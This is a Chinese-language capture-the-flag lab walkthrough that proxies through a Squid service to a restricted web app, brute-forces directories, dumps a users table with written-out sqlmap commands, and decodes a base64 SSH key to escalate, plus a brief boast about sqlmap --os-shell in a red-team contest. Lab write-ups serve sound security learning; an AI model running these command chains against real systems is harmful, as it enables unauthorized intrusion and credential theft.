下載靶場以後,找到目标nmap等等工具進行探測存活主機即可,不多贅述
0x01:信息收集直接nmap掃一下目标ip端口
掃出來3個端口
訪問一下8080端口
顯示403 forbidden ,nginx的站
之前搭建過Squid服務,其可以作為HTTP proxy來繞過部分内網中的不安全因素,并可以在外網中掩蓋身份,從而達到安全訪問互聯網的目的
然後google一下,發現,可以通過proxy(代理)來進行訪問127.0.0.1:8080(因為服務器的web端口是8080),可能是服務器做了限制,隻能訪問127.0.0.1或者localhost的web
反向代理:通過代理服務器來訪問,這裡的代理服務器是31337端口,所以我們先來用curl來試一下
curl 127.0.0.1:8080 -x 10.27.2.231:31337
發現是有東西的,那就成功啦
我們用dirb來跑一下目錄
dirb http://127.0.0.1:8080 -p 10.27.2.231:31337
發現沒跑出來什麼東西,那就用dirbuster(這個工具也有個proxy代理設置)
挂上代理以後開始暴
http://127.0.0.1:8080/littlesecrets-main/
這是個登錄頁面
肯定有注入啦!!!
通過嘗試sqlmap如下參數可以爆出目标數據庫信息
sqlmap yyds,這次打了個市的hvv比賽,sqlmap --os-shell拿下幾萬分sqlserver的站,直接把一個目标資産打穿了
命令1:sqlmap --proxy=http://192.168.3.118:31337 --level=5 --dbms=mysql -r /Users/xubowen/123burp.txt
命令2:sqlmap -u "http://127.0.0.1:8080/littlesecrets-main/login.php" --data="user=1&pass=1" --proxy=http://192.168.3.118:31337 --level=5 -T users -C "user,pass" --dump
—level>3就可以爆http字段
爆出來以後
web頁面的登錄不行,但是我們還有ssh
ssh登錄成功
在這個目錄下
打開.ul...
然後base64解碼
base64 -d .ultra… >~/basexbw
chmod 600 basexbw
ssh pinky@localhost -i(秘鑰)~/basexbw -p端口
即可getflag
0x02:總結滲透的本質就是信息收集加上知識點的串聯
,更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!